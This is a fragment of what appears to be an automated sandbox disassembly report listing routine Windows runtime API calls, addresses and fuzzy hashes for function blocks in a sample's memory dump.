                                                        • Opcode ID: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                                                        • Instruction ID: e87ed1bb16eb8be6f8b96595097180185a60ce52c98033cfd4ddfb8cddd90555
                                                        • Opcode Fuzzy Hash: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                                                        • Instruction Fuzzy Hash: C50179713002057F87209FB59C80A9B7AF4EB44B45318003EB558C3251DB6DCFC29BE9
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004178A3
                                                        • GetStdHandle.KERNEL32(000000F4,0041BD2C,00000000,00000000,00000000,?), ref: 00417979
                                                        • WriteFile.KERNEL32(00000000), ref: 00417980
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: File$HandleModuleNameWrite
                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $X*B$*B
                                                        • API String ID: 3784150691-2787626558
                                                        • Opcode ID: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                                                        • Instruction ID: 83e6cc08efc147308ddc610541e3e7ace00831554afff49654370310fabd765f
                                                        • Opcode Fuzzy Hash: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                                                        • Instruction Fuzzy Hash: 6E310472A00218AFEF20E660DD45FDA737DEB45344F5000ABF544D6140EBBCAAC58BAD
                                                        APIs
                                                        • LCMapStringW.KERNEL32(00000000,00000100,0041BDF8,00000001,00000000,00000000,771AE860,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 0041885F
                                                        • LCMapStringA.KERNEL32(00000000,00000100,0041BDF4,00000001,00000000,00000000,?,?,004186BE,?,?,?,00000000,00000001), ref: 0041887B
                                                        • LCMapStringA.KERNEL32(?,?,?,004186BE,?,?,771AE860,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188C4
                                                        • MultiByteToWideChar.KERNEL32(?,004256C5,?,004186BE,00000000,00000000,771AE860,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188FC
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,004186BE,?,00000000,?,?,004186BE,?), ref: 00418954
                                                        • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,004186BE,?), ref: 0041896A
                                                        • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,004186BE,?), ref: 0041899D
                                                        • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,004186BE,?), ref: 00418A05
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: String$ByteCharMultiWide
                                                        • String ID:
                                                        • API String ID: 352835431-0
                                                        • Opcode ID: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                                                        • Instruction ID: 3960beb12fca16cbc5043acf4b8975ab8d8a6698fa07e30ad5f7fd63c5f4fb56
                                                        • Opcode Fuzzy Hash: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                                                        • Instruction Fuzzy Hash: 14517B71900209EFCF228F95CC45AEF7FB5FF48794F10452AF918A1260C7398991DBAA
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041752A
                                                        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041753E
                                                        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041756A
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175A2
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175C4
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175DD
                                                        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 004175F0
                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041762E
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                        • String ID:
                                                        • API String ID: 1823725401-0
                                                        • Opcode ID: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                                                        • Instruction ID: 0d29547afa55ef8e208fbe3ff43deda8167c9cf171b961166aceb77faed46397
                                                        • Opcode Fuzzy Hash: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                                                        • Instruction Fuzzy Hash: 4A31ADB250D3157ED7207F799C848FBBABDEA49368B11053BF555C3200EA298DC286AD
                                                        APIs
                                                        • GetStringTypeW.KERNEL32(00000001,0041BDF8,00000001,?,771AE860,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AAB
                                                        • GetStringTypeA.KERNEL32(00000000,00000001,0041BDF4,00000001,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AC5
                                                        • GetStringTypeA.KERNEL32(?,?,?,?,004186BE,771AE860,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AF9
                                                        • MultiByteToWideChar.KERNEL32(?,004256C5,?,?,00000000,00000000,771AE860,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418B31
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,004186BE,?), ref: 00418B87
                                                        • GetStringTypeW.KERNEL32(?,?,00000000,004186BE,?,?,?,?,?,?,004186BE,?), ref: 00418B99
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: StringType$ByteCharMultiWide
                                                        • String ID:
                                                        • API String ID: 3852931651-0
                                                        • Opcode ID: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                                                        • Instruction ID: e288f18e772608454304c6360a88be647065f5ca3cb36798b5d5ed4d75a3f5a0
                                                        • Opcode Fuzzy Hash: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                                                        • Instruction Fuzzy Hash: B0416DB2600219BFCF208F94DC86EEF7F79EB08794F10442AF915D2250D7389991CBA8
                                                        APIs
                                                        • GetVersionExA.KERNEL32 ref: 004158CF
                                                        • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00415904
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00415964
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentFileModuleNameVariableVersion
                                                        • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                        • API String ID: 1385375860-4131005785
                                                        • Opcode ID: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                                                        • Instruction ID: 007b09a40ac423c1d447adb87a92c2e34be193f5817f586218815b66d4303cb2
                                                        • Opcode Fuzzy Hash: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                                                        • Instruction Fuzzy Hash: 403177F1961648EDEF3196709C82BDF3B78DB46324F2400DBD185D6242E6388EC68B1B
                                                        APIs
                                                        • GetStartupInfoA.KERNEL32(?), ref: 0041769F
                                                        • GetFileType.KERNEL32(?,?,00000000), ref: 0041774A
                                                        • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004177AD
                                                        • GetFileType.KERNEL32(00000000,?,00000000), ref: 004177BB
                                                        • SetHandleCount.KERNEL32 ref: 004177F2
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: FileHandleType$CountInfoStartup
                                                        • String ID:
                                                        • API String ID: 1710529072-0
                                                        • Opcode ID: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                                                        • Instruction ID: 1521dec5194d53324a877df202082dadc936f581ec6971422c000dc394b087b4
                                                        • Opcode Fuzzy Hash: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                                                        • Instruction Fuzzy Hash: 39510B716086458FC7208B28D8847A67BB0FB11378F65866ED5B2C72E0D738A886C759
                                                        APIs
                                                        • CharUpperW.USER32(00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AC2
                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,00403B6F), ref: 00403ACE
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000004,00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AE9
                                                        • CharUpperA.USER32(?,?,00000000,00000000,?,00403B6F), ref: 00403B02
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001,?,00000000,00000000,?,00403B6F), ref: 00403B15
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: Char$ByteMultiUpperWide$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3939315453-0
                                                        • Opcode ID: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                                                        • Instruction ID: 0842cb939f6927aecb542cd9758d214692c03acffe84293a02396fd76ee0080f
                                                        • Opcode Fuzzy Hash: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                                                        • Instruction Fuzzy Hash: B30144B65001197ADB20ABE49CC9DEBBA7CDB08259F414572F942A3281E3756E4487B8
                                                        APIs
                                                        • GetLastError.KERNEL32(00000103,7FFFFFFF,00416EEF,00417BBE,00000000,?,?,00000000,00000001), ref: 00415525
                                                        • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00415533
                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041557F
                                                          • Part of subcall function 00416EFC: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00416FF2
                                                        • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00415557
                                                        • GetCurrentThreadId.KERNEL32 ref: 00415568
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                        • String ID:
                                                        • API String ID: 2020098873-0
                                                        • Opcode ID: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                                                        • Instruction ID: cede6b9146d9eee740ee2dfbc4b23865fcca372efd47330e9e203dd76af2c63a
                                                        • Opcode Fuzzy Hash: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                                                        • Instruction Fuzzy Hash: 09F09635A01611BBC7312B74AC096DB3E62EB857A1B51413AF551962A4DB28888196EC
                                                        APIs
                                                          • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                                          • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                                                        • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00414BA4), ref: 00417E8B
                                                          • Part of subcall function 0041576B: LeaveCriticalSection.KERNEL32(?,00413F70,00000009,00413F5C,00000000,?,00000000,00000000,00000000), ref: 00415778
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterInfoInitializeLeave
                                                        • String ID: +B$WB$WB
                                                        • API String ID: 1866836854-4076192905
                                                        • Opcode ID: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                                                        • Instruction ID: 91cfe2518806d3d9ee68befd2fe7c4d9c34af4d87c59522c175cbc6726151178
                                                        • Opcode Fuzzy Hash: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                                                        • Instruction Fuzzy Hash: FC41243164C654AEE720DB24D8853EB7BF1AB05314FB4406BE5488B291CABD49C7C74C
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                                                        • Instruction ID: b0a20c71c01645f6642c62949d543ab21d76ee58160ce25a59b39075e73dd19d
                                                        • Opcode Fuzzy Hash: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                                                        • Instruction Fuzzy Hash: 4691E671D01514ABCB21AB69DC85ADEBBB4EFC5764F240227F818B62D0D7398DC1CA6C
                                                        APIs
                                                        • HeapAlloc.KERNEL32(00000000,00002020,00420818,00420818,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165BD
                                                        • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165E1
                                                        • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165FB
                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?), ref: 004166BC
                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?,00000000), ref: 004166D3
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual$FreeHeap
                                                        • String ID:
                                                        • API String ID: 714016831-0
                                                        • Opcode ID: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                                                        • Instruction ID: 0af9858cac0a30669fb94f5f64461d90f8de944a7195c69e4f59e8ed45fdce2d
                                                        • Opcode Fuzzy Hash: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                                                        • Instruction Fuzzy Hash: 983101B0700705EBD3309F24EC45BA2BBE4EB44794F12823AE55597791E778E8818BCC
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040978C
                                                          • Part of subcall function 004095DD: EnterCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095E2
                                                          • Part of subcall function 004095DD: LeaveCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095EC
                                                        • EnterCriticalSection.KERNEL32(?), ref: 004097B9
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004097D5
                                                        • __aulldiv.LIBCMT ref: 00409824
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$H_prolog__aulldiv
                                                        • String ID:
                                                        • API String ID: 3848147900-0
                                                        • Opcode ID: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                                                        • Instruction ID: 0a470d0c852558693c62499fef9fcf54cb9603282822d0262474d13d459b1607
                                                        • Opcode Fuzzy Hash: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                                                        • Instruction Fuzzy Hash: D2316076A00219AFCB10EFA1C881AEFBBB5FF48314F00442EE10573692CB79AD45CB64
                                                        APIs
                                                          • Part of subcall function 00413260: SetEvent.KERNEL32(00000000,00407649), ref: 00413263
                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040961A
                                                        • LoadIconA.USER32(00000000), ref: 00409634
                                                        • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00409645
                                                        • SetTimer.USER32(?,00000003,00000064,00000000), ref: 00409654
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: EventIconItemLoadMessageSendTimer
                                                        • String ID:
                                                        • API String ID: 2758541657-0
                                                        • Opcode ID: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                                                        • Instruction ID: 551790b6ae67963d7c94afa5d69916b6b09ae611f895d6b9f891aac7cfc7161a
                                                        • Opcode Fuzzy Hash: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                                                        • Instruction Fuzzy Hash: AF010830140B00AFD7219B21DD5AB66BBA1BF04721F008B2DE9A7959E0CB76B951CB48
                                                        APIs
                                                        • SetLastError.KERNEL32(00000078,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040484F
                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040486B
                                                        • SetFileTime.KERNEL32(00000000,00000000,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000), ref: 00404882
                                                        • CloseHandle.KERNEL32(00000000,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?), ref: 0040488E
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
